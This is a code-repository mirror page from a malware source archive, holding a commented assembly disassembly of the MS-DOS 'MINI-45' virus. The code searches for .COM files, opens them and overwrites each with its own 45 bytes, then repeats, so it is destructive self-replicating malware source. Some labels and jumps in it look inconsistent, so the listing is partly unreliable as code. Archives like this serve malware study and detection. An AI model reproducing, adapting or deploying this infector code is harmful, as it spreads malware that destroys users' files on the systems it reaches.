Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-25 00:18:34 +00:00
Code Releases Activity
main
vxug-MalwareSourceCode/MSDOS/M-Index/Virus.MSDOS.Unknown.mini-45.asm
vxunderground 4b9382ddbc re-organize 
push
2022-08-21 04:07:57 -05:00

50 lines
2.3 KiB
NASM
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;***************************************************************
; DISASSEMBLY of the MINI-45 VIRUS
;***************************************************************
; FIND .COM FILE TO INFECT
;***************************************************************
MOV DX, 127h ;filehandle search criteria-27bytes
;away from beg. of file
MOV AH, 4Eh ;setup for Dos function-find file
INT 21h ;search for first file match
JB FILESPEC ;jump below and return
;****************************************************************
; OPEN FILE
;****************************************************************
FIRST_FILE:
MOV DX, 009Eh ;pointer to asciiz file spec
MOV AX, 3D02h ;moving 3d into ah=call dos to open file
;moving 02 into al=we want read\write
;access
INT 21h ;call dos function and open file.
;file handle found is put in ax register
JB NEXT_MATCH ;search for next match
;****************************************************************
; WRITE VIRUS CODE TO FILE
;****************************************************************
XCHG AX,BX ;put retrieved file handle from 3d open
;call into bx so it can be used for
;write function.
MOV DX, 0100h ;point to buffer of data to write, i.e.
;to myself
MOV CX, 002Dh ;#of bytes to write. 45d bytes
MOV AH, 40h ;setup write to file dos function
INT 21h ;write to file indicated in bx
;******************************************************************
; CLOSE FILE
;******************************************************************
MOV AH, 3Eh ;setup for dos function to close file
INT 21h ;close file
;******************************************************************
; FIND NEXT FILE MATCH
;******************************************************************
NEXT MATCH:
MOV AH, 4Fh ;search for next file match
JMP FIRST_FILE ;return above
;******************************************************************
;
FILESPEC:
db '*.com'
db 00

View Git Blame Copy Permalink